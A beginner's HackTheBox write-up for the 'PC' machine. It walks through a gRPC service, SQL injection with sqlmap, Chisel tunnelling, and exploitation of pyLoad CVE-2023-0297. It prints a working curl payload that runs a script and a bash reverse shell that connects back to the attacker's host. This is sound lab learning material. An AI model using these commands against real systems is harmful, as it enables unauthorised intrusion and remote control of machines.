HackTheBox Writeup — PC
Hello everyone, I’m a beginner here! I’m trying to write a write-up on an HTB machine again.
First things first, I performed port scanning and found that only 2 ports are open. These include port 22, which is SSH, and port 50051, which I have no idea about its purpose.
nmap -p- -sC -sV --min-rate 5000 10.10.11.214 -oN nmappc -Pn
And I decided to look at the HTTP site but found nothing there.
Thus, I did some research on Google and noticed that port 50051 is the default port for the gRPC channel.
And then, I found a way to access the server using tools called grpcui or gRPC UI.
First, install it. Then, access the server using this command:
grpcui -plaintext 10.10.11.214:50051
and it will automatically open up a web page.
After playing around with the UI interface, I realized that I can request the data using the credentials “admin:admin”. This resulted in a response with a user token and an ID number.
Thence, I started intercepting using Burp Suite with the token and ID in the method getInfo().
I realized there might be an SQL injection vulnerability in the parameter “id,” but again, I have no idea how to exploit it or take any further action.
Therefore, I saved the request and named it “sqli.req,” although the file name is actually optional.
And I used SQLmap to perform a POST request injection using the saved request.
sqlmap -r sqli.req --dump
And tadaa! I obtained valid SSH credentials.
Login using SSH with the obtained credentials.
Privilege Escalation
Using linpeas.sh, I found no interesting binaries, CVEs, or other noteworthy findings. However, I did identify an active port, which is port 8000.
Thus, I attempted to access it using Chisel. I transferred Chisel from my local machine to the target machine and ran the following command on my local machine:
chisel server -p 3477 --reverse
And on the target machine, run the following command:
./chisel client 10.10.14.10:3477 R:8000:127.0.0.1:8000/tcp
Access the server on the browser by entering the following URL: http://127.0.0.1:8000/
nce again, Google proves to be the key to everything on this machine. After trying default credentials without success, I conducted a search for vulnerabilities and discovered that pyLoad has a vulnerability (CVE-2023–0297) in this case.
The vulnerability suggests that it can exploit the code using the following command:
Create a bash script named “bash.sh” on the target machine that contains the code for a reverse shell connecting back to my local machine.
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.10/1337 0>&1
And set up a listener on port 1337 on local machine.
nc -nvlp 1337
Make slight modifications to the command or exploit code, and execute it on the target machine:
curl -i -s -k -X $'POST' \
--data-binary $'jk=pyimport%20os;os.system(\"bash%20/tmp/bash.sh\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
$'http://127.0.0.1:8000/flash/addcrypted2'
This will execute the “bash.sh” script on the target machine, thereby creating a reverse shell connection to my local machine.
Now it’s done, the machine is rooted. Thank you for reading! :)